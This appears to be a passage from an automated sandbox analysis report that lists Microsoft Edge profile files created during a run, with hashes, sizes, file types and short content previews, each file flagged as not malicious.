MD5:	13BE4396CD3C9E7B33FEEF1D2DFE79A3
SHA1:	4772F468762E0EF94C42B20638BA6D85D1BC1AC2
SHA-256:	18516B2B512B9D01D1479353746E5E4B6D156A1107EB1533CD62FD5E3070ED2B
SHA-512:	F601910559EA78E597238DF2AD7F0EC745B048B5754BF4F14E842CC807763A33345E84FCEA89C17BD23D3604323C08D0E3DAF2549E00CE36DC6704F0E07F6169
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	5.277007936189463
Encrypted:	false
SSDEEP:	12:gfvVaYeb8rcHEZrELFUt87h9/+7hP5OaYeb8rcHEZrEZSJ:WVaYeb8nZrExg8aOaYeb8nZrEZe
MD5:	ED9F3007248F94E2E9AC0C613C339C4C
SHA1:	4181EED4E5F6D51DD1CDFC5E90371462D4BFE209
SHA-256:	850BD8AB2A5332D45073B8E3784C4D37746724A0ED3ACE1341BBAEC179943B99
SHA-512:	4AFA5E971AE6302CFC3F95B036F4E98E1A413EE39706472BE19AAA56C3F2431B0C27DCAF768A45BBD7F56AA40EA085BE64BD7B6CDDEC7B42ADBF0C5628E747D3
Malicious:	false
Preview:	2024/11/25-18:25:34.665 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/25-18:25:34.666 1e44 Recovering log #3.2024/11/25-18:25:34.666 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	412
Entropy (8bit):	5.277007936189463
Encrypted:	false
SSDEEP:	12:gfvVaYeb8rcHEZrELFUt87h9/+7hP5OaYeb8rcHEZrEZSJ:WVaYeb8nZrExg8aOaYeb8nZrEZe
MD5:	ED9F3007248F94E2E9AC0C613C339C4C
SHA1:	4181EED4E5F6D51DD1CDFC5E90371462D4BFE209
SHA-256:	850BD8AB2A5332D45073B8E3784C4D37746724A0ED3ACE1341BBAEC179943B99
SHA-512:	4AFA5E971AE6302CFC3F95B036F4E98E1A413EE39706472BE19AAA56C3F2431B0C27DCAF768A45BBD7F56AA40EA085BE64BD7B6CDDEC7B42ADBF0C5628E747D3
Malicious:	false
Preview:	2024/11/25-18:25:34.665 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/25-18:25:34.666 1e44 Recovering log #3.2024/11/25-18:25:34.666 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	1473
Entropy (8bit):	5.677834120302372
Encrypted:	false
SSDEEP:	24:xZWJ5zTrXZpW2sFV0374/hTMyN8WSUlHglEBkTN5zgFHHmi28/V:xZmtTrXZQ2iV0374/h4yN8fXL+HH328t
MD5:	484752FAEE0E04083D0D64181D97E983
SHA1:	5A8CA3ED2B3A1337B46ED69AE58F7B951A9CDFA5
SHA-256:	4DE14D88670BBCD1CE33564484EFB8722D57E69E94F7C70577CA275639027DDA
SHA-512:	6B62A950FBD76C07CDD4EDCF70EE750422A90BDFA3AA36BF0BC4D8460AF24C6107191577495CB386C62A50EF56A2A0FCB0D080F5F9D095E85A53259750A7391E
Malicious:	false
Preview:	.Q.).................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1732577147291.._https://ntp.msn.com..MUID!.0675AFABBF8562701E27BAE9BE8263C5.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732577147412,"schedule":[28,-1,16,9,-1,-1,-1],"scheduleFixed":[28,-1,16,9,-1,-1,-1],"simpleSchedule":[18,49,43,23,34,13,48]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732577147252.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Nov 25 2024 18:25:46 GMT-0500 (Eastern Standard Time).!_https://ntp.msn.com..storageTest....$................META:https://ntp.msn.com.............._https://ntp.msn.com..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	337
Entropy (8bit):	5.172789603760686
Encrypted:	false
SSDEEP:	6:HApx5Vq2PN723oH+Tcwt8a2jMGIFUt8YApI3AgZmw+YApnwIkwON723oH+Tcwt8N:gFVvVaYeb8EFUt87i3Ag/+7aI5OaYebw
MD5:	F35BF46CE1EFB34C888999EDD463E806
SHA1:	E8BBD9F607E8F57E2EC8DF38D9D996237B07A15C
SHA-256:	2586EDA34794ADF8B5B7C0C8F44179DDD00CB37C623A1418BB5BF71CA5D78709
SHA-512:	008633CF1518B33672225F9DE7B45465C9CDFCC6A9DE57099AF013BDB207DD8F9FDE0B58E08F22D75165636C7FB25EC0C676EC6BE2E09ACDD2921DE3FF0D7523
Malicious:	false
Preview:	2024/11/25-18:25:30.455 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/25-18:25:30.459 d34 Recovering log #3.2024/11/25-18:25:30.465 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	337
Entropy (8bit):	5.172789603760686
Encrypted:	false
SSDEEP:	6:HApx5Vq2PN723oH+Tcwt8a2jMGIFUt8YApI3AgZmw+YApnwIkwON723oH+Tcwt8N:gFVvVaYeb8EFUt87i3Ag/+7aI5OaYebw
MD5:	F35BF46CE1EFB34C888999EDD463E806
SHA1:	E8BBD9F607E8F57E2EC8DF38D9D996237B07A15C
SHA-256:	2586EDA34794ADF8B5B7C0C8F44179DDD00CB37C623A1418BB5BF71CA5D78709
SHA-512:	008633CF1518B33672225F9DE7B45465C9CDFCC6A9DE57099AF013BDB207DD8F9FDE0B58E08F22D75165636C7FB25EC0C676EC6BE2E09ACDD2921DE3FF0D7523
Malicious:	false
Preview:	2024/11/25-18:25:30.455 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/25-18:25:30.459 d34 Recovering log #3.2024/11/25-18:25:30.465 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\235cc606-a233-4fce-9d1e-57c163d2a5e0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1484
Entropy (8bit):	5.305238649689771
Encrypted:	false
SSDEEP:	24:YcCp/WwFGJ/I3RdsKZVMdmRdsyZFRudFGRw6maPsw6C1VdsFSZC52HOQYhbA7n7:YcCpfgCzsutsmfc7kBRsFGCgHfYhbm
MD5:	68B3C5E46D51E8FA622D32F97DD35D96
SHA1:	D87F64254188C53AA534FE810557B2867056AE30
SHA-256:	A21A565FDFA671C902AE39E161E98BDB2CC425B74AA49C077AB5831D7F95BCF9
SHA-512:	85681B768000E6F805A89F1095910601CE568CFBAFE631E2CF97D423EA213D35CF9D71D8CDAE2995996D365ABC4B7D0BBA422B0228B54B3A3CB6BC42C7EA8329
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379642734494040","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379642737468682","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edge.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWR

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\46fdc821-d3ad-49e3-887c-6555d90a6576.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4b6d580f-630c-47a7-b58a-3c60327aa355.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\71ccdf0f-d692-441d-bbf9-662a63a9894b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7625330458929205
Encrypted:	false
SSDEEP:	96:te+AufSsDuk8xd0hAZ+HS3sEL36HLq+rV1cRhfsjXckO0L/ZJV8Y:tTfhiF0hI+HIsG6r1X2hEjXcf0L/ZJVb
MD5:	51179C1CE879E9A4F8632F88EF74F6D1
SHA1:	37B4959B55D9A9E57ECE3A9958DD941BB5F82C7B
SHA-256:	9274F1370348952D45053900EB1123260FD84280E48BB38C270AA3BE6521C1CD
SHA-512:	60721BE626EDC8063092A1AC0C8FA6E81B3E8724A92A5D1AD282C9DFDCF0482B04E7D14C0BD3E8929AD4725BC52EBCCE4170863A5ABE4F614F2ACA6616658AFF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1452
Entropy (8bit):	5.287213485277577
Encrypted:	false
SSDEEP:	24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
MD5:	093E3F0EA7D5CE1697260321E93C95EB
SHA1:	6D262FF62829A9F3990AFC80B9F457A1F345290C
SHA-256:	76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
SHA-512:	2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4c1e5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1452
Entropy (8bit):	5.287213485277577
Encrypted:	false
SSDEEP:	24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
MD5:	093E3F0EA7D5CE1697260321E93C95EB
SHA1:	6D262FF62829A9F3990AFC80B9F457A1F345290C
SHA-256:	76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
SHA-512:	2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.3765430199422153
Encrypted:	false
SSDEEP:	48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB52:JkIEumQv8m1ccnvS6k/+lGFh5O9aw1a
MD5:	32E670D72462918715AA764831BA76BF
SHA1:	493DDA2AAB382829FE591E4F8B21CC476D8F747D
SHA-256:	3AA7B7794426C053C75892876B1FFD34D5B8E82FC42C49903A622580CDFA6921
SHA-512:	FF73143A9C03C780CEE4ABA82D0C80C1280F3AB87698734E2A5FBB748BEC9CD6F8DA9E7826AA355615195A8FF2FEBD39C8F4260117B4AC6E7903688246CFE1AA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3b557.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3c600.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\da04f8fd-b7b5-4853-8a82-63ed0953e7a9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e4cdfaac-96a9-4551-87b6-68e32893b181.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1452
Entropy (8bit):	5.287213485277577
Encrypted:	false
SSDEEP:	24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
MD5:	093E3F0EA7D5CE1697260321E93C95EB
SHA1:	6D262FF62829A9F3990AFC80B9F457A1F345290C
SHA-256:	76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
SHA-512:	2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f8e8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
SHA-256:	FED570847D240E3D6C49E7973403D61169779C08DF631829B50373D7EA00AC6E
SHA-512:	AD38C3570486DEE9BCB44D2AC08EB552799E29760AA19F3C53A204AC6F87E61C684718E70F180C34815C47108F392313DAF80B0EFB6F63E15CD4082E75FB7823
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4245d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1070370750413225
Encrypted:	false
SSDEEP:	192:st1kdp+swzKaFvrE9kDvTe8EbV+FGMQAwUNPxYJ:st1Q+scKCDpIbGJQOg
MD5:	B416A14104F920D8D3BC7C4098BD42F1
SHA1:	A3F7EB93714F0DBAD9EB8BEF63A64904F2C16C54
